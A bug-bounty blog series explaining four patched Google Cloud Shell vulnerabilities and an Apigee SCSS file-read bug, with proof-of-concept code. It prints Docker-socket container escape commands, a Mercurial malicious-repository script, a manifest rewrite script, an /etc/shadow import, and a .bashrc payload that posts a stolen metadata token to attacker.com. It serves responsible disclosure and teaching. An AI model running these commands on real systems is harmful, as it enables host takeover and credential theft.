Category: bug bounty hunting

4 Google Cloud Shell bugs explained – bug #1

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #1 – The Python Language Server

Introduction

Google Cloud Shell provides users with a feature called “Open In Cloud Shell”. By using this feature, users can create a link that automatically opens Cloud Shell and clones a Git repository hosted on either Github or Bitbucket. This is done by passing the ‘cloudshell_git_repo’ parameter to the Cloud Shell URL, as can be seen in the code below:

<a href="https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=http://path-to-repo/sample.git"><img alt="Open in Cloud Shell" src ="https://gstatic.com/cloudssh/images/open-btn.svg"></a>

Upon opening the link, Cloud Shell is launched and the ‘http://path-to-repo/sample.git&#8217; repo is cloned inside the users home directory.

Multiple parameters can be passed, other than the ‘cloud_git_repo’ GET-parameter. When combining the ‘cloud_git_repo’ with the ‘open_in_editor’ parameter we can clone a repository and launch the Theia IDE on a file specified all at once. A full overview of all supported GET-parameters can be found in the Cloud Shell documentation.

PYLS

When a user clones a Git repository containing ‘some_python_file.py’ and passes this file to the open_in_editor GET-parameter (‘open_in_editor=some_python_file.py’) the Theia editor starts editing the specified file. In the editor we can clearly see that all of a sudden the IDE received syntax highlighting and autocompletion capabilities:

When inspecting the processes running with ‘ps’ we notice a new process. The editor_exec.sh script fired up the pyls python language server.

wtm          736  0.0  0.1  11212  2920 ?        S<s  13:54   0:00 /bin/bash /google/devshell/editor/editor_exec.sh python -m pyls

The parent process appears to be sshd. If we attach strace to the sshd process and watch the Python language server being fired up, we can inspect all the system calls being executed. We save the output to ‘/tmp/out’ for later inspection.

While going through all the syscalls in ‘/tmp/out’ i noticed the Python language server is trying to query non-existent packages in my home directory with the stat() syscall.

538   stat("/home/wtm/supervisor", 0x7ffdf08e11e0) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/pyls", 0x7ffcbbf61a10) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/google", 0x7ffcbbf5fe00) = -1 ENOENT (No such file or directory)

When Python < 3.3 tries to import a package, it looks for a ‘__init__.py’ file which is executed. (See PEP 382 for more information). We now have our attack vector!

Constructing the exploit

If we create an evil Python git repository named ‘supervisor’, ‘pyls’ or ‘google’ containing a malicious ‘__init__.py’ we can trick the Python language server into executing arbitrary code. All we have to do is store the evil repository on Github and point our victim to https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/supervisor&open_in_editor=__init__.py. By passing ‘__init__.py’ to the ‘open_in_editor’ GET-parameter, we force the IDE into automatically launching the Python Language Server.

That same language server now starts looking for a package named ‘supervisor’ which ofcourse now can be found since we have just cloned the repository with the same name. The malicious code hidden inside ‘__init__.py’ is then executed, meaning our victims GCP resources are compromised.

Continue reading: Bug #2 – A custom Cloud Shell image

4 Google Cloud Shell bugs explained – bug #2

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #2 – A custom Cloud Shell image

Introduction

The Cloud Shell presented to you by default is based on a Debian 9 Stretch Docker image. This image contains the most popular tools and is stored in Google’s Cloud Repository at http://gcr.io/cloudshell-images/cloudshell:latest.

If a user has special needs it can replace the Debian Cloud Shell image and launch a custom image. For example, if you wish to use a Terraform image for infrastructure provision, you can replace the Debian image with the Terraform image under the Cloud Shell Environment settings.

Another way to automatically boot a custom Docker image is by providing the ‘cloudshell_image’ GET-parameter, as such: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_image=gcr.io/google/ruby

The trusted environment

Google makes a distinction between the default image and custom images. A container running the default image comes with your home folder mounted to /home/username. Furthermore upon boot it provisions your gcloud client with credentials.

When launching a custom image from an untrusted third party this might introduce a security risk. What if a custom image contains malicious code and tries to access your GCP resources?

Google therefore introduced ‘trusted’ and ‘untrusted’ mode. The only image that is automatically runs in trusted mode is ‘gcr.io/cloudshell-images/cloudshell:latest’. When booting a custom image in untrusted mode, the container is provisioned with a scratch home directory mounted to /home/user that is empty and deleted on end. Furthermore there are no credentials attached to the gcloud client and you can not query the metadata instance on metadata.google.internal to obtain a bearer token.

Escaping the untrusted environment

We have already learned how we can escape to the host from the default Cloud Shell in the general introduction of this series of posts. We again paste the following lines of code.

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

At this point we have a shell on the host. We change the root by chrooting into /rootfs with ‘chroot /rootfs’. After searching the filesystem it became apparent that the host instance was in a different state then expected. While the container hosting the custom Docker image had a empty /home/user folder attached to it, the ‘dmesg’ and ‘mount’ command clearly show that the persistent disk containing the home folder of the user is still attached to the underlying instance!

Exploiting it

With the above knowledge any attacker can now build a malicious Docker image. This malicious Docker image can use the same technique as displayed above to escape to the host istance when booted. After escaping to the host the malicious image can steal contents from the user’s home folder.

Furthermore an attack can write arbitrary contents to the user’s home folder in an attempt to steal credentials, for example by adding the following code to ‘/var/google/devshell-home/.bashrc’

curl -H"Metadata-flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token > /tmp/token.json
curl -X POST -d@/tmp/token.json https://attacker.com/api/tokenupload

Continue reading: Bug #3 – Git clone

4 Google Cloud Shell bugs explained – bug #3

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #3 – Git clone

Introduction

In #Bug 1 of this series of articles we discussed the possibility of appending the ‘cloudshell_git_repo’ GET-repo to the Cloud Shell URL in order to clone a Github or Bitbucket repository. Aside from this parameter we can also specify a ‘cloudshell_git_branch’ and ‘cloudshell_working_dir’ parameter to aid in the cloning process.

How does this work? When we pass these 3 parameters listed above to the Cloud Shell URL, the cloudshell_open bash function is called inside your terminal window. This function is defined in ‘/google/devshell/bashrc.google.d/cloudshell_open.sh’. I have listed the functionality of the most important lines of code below.

function cloudshell_open {
... 
git clone -- "$cloudshell_git_repo" "$target_directory"
cd "$cloudshell_working_dir"
git checkout "$cloudshell_git_branch"
...
}

We see that ‘git clone’ is executed against our URL specified in the cloudshell_git_repo GET-parameter. Then the script changes the working directory by cd-ing into any directory specified in cloudshell_working_dir. Then it calls ‘git checkout’ on the specified git branch. Considering the fact that all input parameters are properly filtered, this might seem harmless at first

Git-hooks

Git-hooks are custom scripts that are fired when an important action is executed. The git-hooks that are created by default when you run ‘git init’ are stored in .git/hooks and might look something similar to this.

Wouldn’t it be cool if we can store these custom scripts inside a evil repository and have them executed when a victim’s Cloud Shell execute ‘git checkout’? According to the Git manual that’s not possible. These hooks are client-side hooks. Anything that is hidden inside .git/ is ignored and thus not copied to the remote repo.

Bare repositories

The standard way of creating a repository is with ‘git init’. This creates a working repository with the well know layout. It contains a .git/ directory where all revision history and metadata is stored and it contains the checked out version of the files you are working on.

There is another format in which a repository can be stored however. It is called a bare repository. This type of repository is normally used for sharing and has a sort of flat layout. It can be created by running the ‘git init –bare’ command.

The exploit

In the screenshot you can clearly see that we have just created a git repo without the ‘.git’ directory but WITH a ‘hooks’ directory! This means we can push the hooks stored in this bare repository to a remote repo, if we hide them in a ‘normal’ repositories subdirectory. Remember the ‘cd’ command in the cloudshell_function? We can jump into any subdirectory we want and execute ‘git checkout’, after which hooks that are present get fired.

I published a proof of concept for this bug for you to look at in https://github.com/offensi/git-poc. Running a git clone and a checkout on this repository as specified in the README will execute a harmless post-checkout hook.

A evil URL to target a Cloud Shell victim would look like this: https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/git-poc&cloudshell_git_branch=master&cloudshell_working_dir=evilgitdirectory. Successful exploitation can be seen in the screenshot below.

Continue reading: Bug #4 – Go get pwned

4 Google Cloud Shell bugs explained – bug #4

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #4 – Go and get pwned

Introduction

While auditing the Javascript code, that’s responsible for all the client-side work in your browser when working with Cloud Shell, i noticed something out of the ordinary.

The code that is handling all GET-parameters, listed a parameter that is not present in the official documentation.

   var B3b = {
        CREATE_CUSTOM_IMAGE: "cloudshell_create_custom_image",
        DIR: "cloudshell_working_dir",
        GIT_BRANCH: "cloudshell_git_branch",
        GIT_REPO: "cloudshell_git_repo",
        GO_GET_REPO: "cloudshell_go_get_repo",
        IMAGE: "cloudshell_image",
        OPEN_IN_EDITOR: "cloudshell_open_in_editor",
        PRINT: "cloudshell_print",
        TUTORIAL: "cloudshell_tutorial"
    };

All parameters listed above are listed and explained in the documentation, except for the ‘cloudshell_go_get_repo’ GET-parameter. When constructing a Cloud Shell URL with this parameter (https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://github.com/some/package), again, the cloudshell_open function is invoked.

The code responsible for handling the ‘go get’ command can be seen below.

function cloudshell_open {
...
valid_url_chars="[a-zA-Z0-9/\._:\-]*"
...
 if [[ -n "$cloudshell_go_get_repo" ]]; then
    valid_go_get=$(echo $cloudshell_go_get_repo | grep -e "^$valid_url_chars$")
    if [[ -z "$valid_go_get" ]]; then
      echo "Invalid go_get"
      return
    fi
...
go get -- "$cloudshell_go_get_repo"
go_src="$(go env GOPATH | cut -d ':' -f 1)/src/$go_get"

All input seemed to be filtered properly. Nevertheless i kept some notes about this finding.

Container Vulnerability scanning

A few months later i was hunting for bugs in Google’s Container Registry (gcr.io). One of the features it provides is called Vulnerability Scanning. When you enable Vulnerability Scanning, every Docker image you push to the registry is scanned for known vulnerabilities and exposures. As new vulnerabilities are discovered, the Container Registry checks if they affect images that are in your registry.

One of the Docker images i had been working on before was, ofcourse, the Cloud Shell image that’s available on https://gcr.io/cloudshell-images/cloudshell:latest. I had this image readily available on my local Docker engine so i pushed it to the registry in order to inspect the workings of the Vulnerability Scanning feature.

Upon opening the results of the scan against the Cloud Shell image i was a bit surprised. The Cloud Shell image seemed to be packed with over 500 vulnerabilities.

After checking almost every vulnerability that was listed, i finally found one that looked interesting and useful to me: CVE-2019-3902.

Exploiting CVE-2019-3902

CVE-2019-3902 describes a vulnerability in Mercurial. Due to a vulnerability in the path-checking logic of the Mercurial/HG client, a malicious repository can write files outside of the repository boundaries on the clients filesystem. I knew that the ‘go get’ command is capable of handling several types of repositories: svn, bzr, git and HG!

Since there is no public exploit for CVE-2019-3902 available i had to try to reconstruct it. I downloaded 2 versions of the Mercurial source code: the patched version and the unpatched version. Hopefully comparing the 2 could provide me with some clues of how to exploit it.

When examining the patched Mercurial source code, i stumbled across automated test cases that were stored in the /tests/ directory. Based on these tests i was able to reconstruct the exploit.

#!/bin/sh
# PoC for Google VRP by wtm@offensi.com
mkdir hgrepo
hg init hgrepo/root
cd hgrepo/root
ln -s ../../../bin
hg ci -qAm 'add symlink "bin"'
hg init ../../../bin
echo 'bin = bin' >> .hgsub
hg ci -qAm 'add subrepo "bin"'

cd ../../../bin
echo '#!/bin/sh' >> cut
echo 'wall You have been pwned!' >> cut
chmod +x cut
hg add cut
hg commit -m "evil cut bin"

cd /var/www/html/hgrepo/root
hg commit -m "final"

The code above constructs a malicious repository. When this repository is being cloned by a vulnerable hg client, a malicious file named ‘cut’ is written to ../../../bin. When we looked at the cloudshell_open function before we saw that the ‘cut’ command is being called right after ‘go get’ clones our malicious repository and thus our arbitrary code is executed.

The malicious repo was stored on a personal webserver under go.offensi.com/hgrepo. A malicious go.html file was placed in the root of the webserver to instruct the ‘go get’ command to clone a Mercurial repository.

<meta name="go-import" content="go.offensi.com/go.html hg https://go.offensi.com/hgrepo/root">

Now any Cloud Shell user can be tricked into arbitrary code execution by opening this link: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://go.offensi.com/go.html

4 Google Cloud Shell bugs explained

Quick navigation

  • Introduction (this page)
  • Bug #1 – The Python language server
  • Bug #2 – A custom Cloud Shell image
  • Bug #3 – Git clone
  • Bug #4 – Go and get pwned



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Introduction

In 2019 i spent a significant amount of my time hunting for bugs in the Google Cloud Platform. While the Google Cloud Platform is known to be a tough target among bughunters, i was lucky enough to have some modest success in finding bugs in one of it’s services, the Google Cloud Shell.

In July i was therefore approached by Eduardo of the Google VRP. He asked me if i was willing to demonstrate a Cloud Shell bug to LiveOverflow as part of an interview for a video, on one precondition though: the bug had to be unfixed by Google! LiveOverflow did a great job in polishing up my bug, the result of which can be seen here.

Later on Google invited me to attend the BugSWAT event in October at Google’s HQ in London. At this event i was able to share some of my findings to my fellow bughunters and Googlers by giving a talk titled “4 Cloudshell bugs in 25 minutes”.

In total i discovered 9 vulnerabilities in the Google Cloud Shell. In this series of posts i will uncover and explain 4 of them, ending with my most favorite one.

About Google Cloud Shell

Google Cloud Shell provides administrators and developers with a quick way to access cloud resources. It provides users with a Linux shell that is accessible via your browser. This shell comes with pre-installed tools needed to start working on your Google Cloud Platform project, such as gcloud, Docker, Python, vim, Emacs and Theia, a Powerful opensource IDE .

Users of the Google Cloud Platform can launch a Cloud Shell instance via the Cloud Console or simply by visiting this url: https://console.cloud.google.com/home/dashboard?cloudshell=true&project=your_project_id

When the Cloud Shell instance is done starting a terminal window is presented to the user. In the screenshot below you can see what that looks like. Noteworthy is the fact that the gcloud client is already authenticated. If an attacker is able to compromise your Cloud Shell, it can access all your GCP resources.

Escaping the Cloud Shell container

When inspecting the running processes with ‘ps’ inside the Cloud Shell it looks like that we might be trapped inside a Docker container. There is only a small number of processes running.

To confirm our suspicion we can inspect the /proc filesystem. Docker Engine for Linux makes use of so called control groups (cgroups).  A cgroup limits an application to a specific set of resources. For example, by using cgroups Docker can limit the amount of memory that is allocated to a container. In the case of Cloud Shell, i identified the use of Kubernetes and Docker by inspecting the contents of /proc/1/environ, as can be seen in the screenshot below.

At this point i knew for sure i was trapped inside a container. If i wanted to learn more about the inner workings of Cloud Shell i needed to find a way to escape to the host. Luckily, after exploring the filesystem i noticed that there were 2 Docker unix sockets available. One in ‘/run/docker.sock‘, which is the default path for our Docker client running inside the Cloud Shell (Docker inside Docker), the second one in ‘/google/host/var/run/docker.sock‘.

The pathname of the second Unix socket reveals that this is the host based Docker socket. Anyone who can communicate with a host based Docker socket can easily escape the container and gain root access on the host at the same time.

Using the script below i escaped to the host.

# create a privileged container with host root filesystem mounted - wtm@offensi.com
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

The bigger picture

Now that i had root access on the host, i started exploring the configuration of Kubernetes, which is stored under ‘/etc/kubernetes/manifests/‘ in YAML files. Based on the Kubernetes configuration and several hours of inspecting traffic with tcpdump i now had a better overview of how the Cloud Shell works. I created a quick and dirty high-level diagram to keep a better overview.

Reconfigure Kubernetes

Most of the containers inside the Kubernetes pods are running unprivileged by default. Because of this we are unable to use debugging tools like gdb and strace inside these containers. Gdb and strace rely on the ptrace() syscall and require a minimum capability of SYS_PTRACE. It’s easier to run all containers in privileged mode, instead of granting them the SYS_PTRACE capability. Therefore i wrote a script to reconfigure the ‘cs-6000’ pod.

The script below writes a new cs-6000.yaml config and links the old config to /dev/null. After running it you will find that all containers inside the pod will automatically reboot. Now all containers run in privileged mode and we can start debugging.

#!/bin/sh
# wtm@offensi.com

# write new manifest
cat /etc/kubernetes/manifests/cs-6000.yaml | sed s/"    'securityContext': \!\!null 'null'"/\
"    'securityContext':\n"\
"      'privileged': \!\!bool 'true'\n"\
"      'procMount': \!\!null 'null'\n"\
"      'runAsGroup': \!\!null 'null'\n"\
"      'runAsUser': \!\!null 'null'\n"\
"      'seLinuxOptions': \!\!null 'null'\n"/g > /tmp/cs-6000.yaml

# replace old manifest with symlink
mv /tmp/cs-6000.yaml /etc/kubernetes/manifests/cs-6000.modified
ln -fs /dev/null /etc/kubernetes/manifests/cs-6000.yaml

Additional resources

Continue reading: Bug #1 – The Python language server

LFI in Apigee portals

Introduction

Apigee provides clients with an API management platform that enables them to design, secure, deploy, monitor, and scale API’s. Furthermore Apigee provides clients with a customizable developer portal to enable developers to consume API’s easily and securely, and to measure API performance and usage. Apigee was acquired by Google in 2016 and therefore it is considered in scope for the Google VRP, meaning that any valid vulnerability found in the Apigee platform will be rewarded.

Creating a custom portal

In order to interact with the development community, API providers can expose their API to the public by building a custom portal. Apigee portals are based on Drupal 7 and come with a preloaded set of options for users to customize. Users can modify the default theme, add pages and users, manage assets and publish API’s, as can be seen in the screenshot taken from the Portal management interface.

manage-portals

When done editing, the portal manager publishes the portal on a subdomain of apigee.io. Healthapix.apigee.io shows a clear example of what the end result of a portal looks like.

Customizing the stylesheet

According to the documentation on https://docs-new.apigee.com, users can edit the style of the theme by using SCSS instead of CSS:

The style rules are defined using Sassy Cascading Style Sheet (SCSS). SCSS is a superset of Cascading Style Sheets (CSS), offering the following advantages:

  • Global variables that can be re-used throughout the style sheet.
  • Nested rules to save style sheet development time.
  • Ability to create mixins and functions

This implicates that on the server side compilation and conversion is taking place. After compilation completes regular CSS files are published to the portal. This process looks like something that might be worth taking a closer look at.

The import directive

When going through the language specific documentation on sass-lang.com, there is one directive that stands out from the rest:

CSS has an import option that lets you split your CSS into smaller, more maintainable portions. The only drawback is that each time you use @import in CSS it creates another HTTP request. Sass builds on top of the current CSS @import but instead of requiring an HTTP request, Sass will take the file that you want to import and combine it with the file you’re importing into so you can serve a single CSS file to the web browser.

In short, the import directive allows us to reference other SCSS files by using this syntax: @import ‘somefile’. When seeing this directive, the SASS compiler will automatically try to locate ‘somefile.scss’, ‘somefile.sass’, or ‘somefile’. Depending on the version of the compiler you are using you might see some small differences in behavior.

Exploitation

What happens if we reference an arbitrary file with @import ‘/etc/shadow’? This file does not contain valid SCSS code, so compilation will most likely fail.

schermafbeelding2019-01-31om2.19.02pm

As can be seen in the image above compilation fails indeed, throwing an error which exposes the contents of /etc/shadow, which is only readable by user root.

This particular bug was fixed within a matter of hours after submitting the details to Google. Thanks to Google for running the VRP the way they do!

[twitter-follow screen_name=’wtm_offensi’]

Copyright © 2020 Offensi

Copyright OffensiUp ↑